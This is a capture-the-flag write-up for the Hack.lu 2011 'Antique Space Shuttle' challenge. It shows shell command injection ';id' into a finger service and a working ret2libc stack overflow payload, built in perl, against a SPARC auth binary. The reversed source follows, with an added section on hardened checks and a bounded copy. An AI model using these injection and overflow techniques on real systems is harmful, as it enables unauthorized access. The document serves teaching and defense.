Write-up - Hack.lu 2011 Antique Space Shuttle (300)

by @Jonathan Salwan and @Florian Gaultier - 2011-09-21

Description

Your command is to get as much information about the crew of an antique space shuttle. We know our ancient father used finger as reference point at nc ctf.hack.lu 2003. By connecting to the service it was possible to execute shell commands.

$> nc ctf.hack.lu 2003
;id
Login    Name                Tty      Idle  Login Time   Office     Office Phone
root     Charlie Root        pts/0      17  Tue 11:00    
user                         pts/1      17  Tue 11:27    
uid=1000(user) gid=100(users) groups=100(users)

We list the current directory.

$> nc ctf.hack.lu 2003
;ls
Login    Name                Tty      Idle  Login Time   Office     Office Phone
root     Charlie Root        pts/0      17  Tue 11:00    
user                         pts/1      17  Tue 11:27    
auth
finger.py
info

We read the "info" file.

$> nc ctf.hack.lu 2003
;cat info
Login    Name                Tty      Idle  Login Time   Office     Office Phone
root     Charlie Root        pts/0      17  Tue 11:00    
user                         pts/1      17  Tue 11:27    
Ok so you got access, now try to get more privileges by exploiting the auth protocol. 
you can login to ssh at port 2004 with user:user4422

After connecting to the machine over ssh we can start working on the "auth" binary. The OS is NetBSD on the SPARC architecture.

$> file ./auth
ELF 32-bit MSB executable, SPARC, version 1 (SYSV), dynamically linked (uses shared libs), for NetBSD 5.1, stripped

The program takes two arguments, a string and a number. A stack buffer overflow can be triggered by passing -1 as the number. ASLR is disabled but the NX bit is enabled, so the stack is not executable and we go for ret2libc. We start by retrieving the address of system() in the libc: 0x2009e4c4. Remember that SPARC is big-endian, so the address is written most significant byte first.

Our payload will be:

[init reg][%o0][%pc @system][/bin/sh]
            |                ^
            +----------------+


-bash-4.2$ /home/user/auth "`perl -e 'print "\xef\xff\xfd\x73"x10 ."\xef\xff\xfd\xa0"x9 ."\x20\x09\xe4\xc4" \
."/////////bin/sh"'`" -1
trying to login
$ id
uid=1000(user) gid=100(users) egid=101(leaders) groups=100(users)
$ ls /home
klingone user
$ cat /home/klingone/secret
LOGBOOK ANDROMEDA7
------------------
key: a3YCcRtDqLMp0OK2

Reverse

// auth binary running on netbsd/sparc (reconstructed from the stripped binary)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void copy(char *srcstr)
{
    char dststr[16];        // 16-byte stack buffer
    strcpy(dststr, srcstr); // unbounded copy: the overflow happens here
}

int main(int argc, char* argv[])
{
    int numchars;
    size_t arglen;
    if (argc != 3)
    {
        printf("no access: %d", argc);
        return 1;
    }

    numchars = atoi(argv[2]);
    if (numchars > 8)           // only an upper bound is checked; a negative value passes
    {
        printf("buffer overflow detected");
        return 1;
    }

    arglen = strlen(argv[1]);
    if (arglen < numchars)      // size_t vs int: -1 converts to SIZE_MAX, so any length passes
    {
        puts("trying to login");
        copy(argv[1]);
    }
    return 0;
}
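The two defects in the reversed code are the signed/unsigned comparison that lets -1 through and the unbounded strcpy() into a 16-byte buffer. The following is an added example, not code from the write-up or from the challenge binary: it isolates the original length check as a function, puts a hardened check and a bounded copy next to it, and runs both on a constructed 40-byte input so the difference in behaviour can be observed without overflowing anything. The function names, DST_SIZE and the sample input are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not part of the original write-up or the challenge binary):
 * the length check from the reversed auth binary beside a hardened version,
 * written as functions so each decision can be tested in isolation. */

#define DST_SIZE 16   /* size of dststr[] in the reversed copy() (assumed) */

/* Mirrors the reversed check: numchars is a signed int, the string length is
 * a size_t.  In "len < numchars" the int is converted to size_t, so -1 becomes
 * SIZE_MAX and any string passes.  Returns 1 when the copy would proceed. */
int vulnerable_would_copy(const char *s, int numchars)
{
    size_t len = strlen(s);
    if (numchars > 8)
        return 0;                            /* "buffer overflow detected" */
    return len < (size_t)numchars ? 1 : 0;   /* the implicit conversion, made explicit */
}

/* Hardened check: reject negative counts before any conversion takes place,
 * and bound the actual length by the destination size (room for the NUL). */
int hardened_would_copy(const char *s, int numchars)
{
    size_t len = strlen(s);
    if (numchars < 0 || numchars > 8)
        return 0;
    if (len >= DST_SIZE)                     /* strcpy needs len + 1 <= DST_SIZE */
        return 0;
    return len < (size_t)numchars ? 1 : 0;
}

/* Bounded replacement for the unbounded strcpy() in copy(): copies at most
 * DST_SIZE - 1 bytes, always NUL-terminates, and returns how many source
 * bytes did not fit (0 means the whole string was copied). */
size_t copy_bounded(char dst[DST_SIZE], const char *src)
{
    size_t len = strlen(src);
    size_t n = len < DST_SIZE - 1 ? len : DST_SIZE - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return len - n;
}

int main(void)
{
    /* Constructed input: 40 bytes, far longer than the 16-byte destination. */
    char big[41];
    char dst[DST_SIZE];
    size_t dropped;

    memset(big, 'A', 40);
    big[40] = '\0';

    printf("vulnerable check, numchars=-1: copy proceeds = %d\n",
           vulnerable_would_copy(big, -1));
    printf("hardened check,   numchars=-1: copy proceeds = %d\n",
           hardened_would_copy(big, -1));
    dropped = copy_bounded(dst, big);
    printf("bounded copy dropped %zu bytes, dst=\"%s\"\n", dropped, dst);
    return 0;
}
```

The key point is the order of the checks: the sign of numchars has to be rejected while it is still an int, because once it takes part in a comparison with a size_t the negative value is gone. The bounded copy is the second, independent layer; even a correct count check is no reason to keep an unbounded strcpy() in copy().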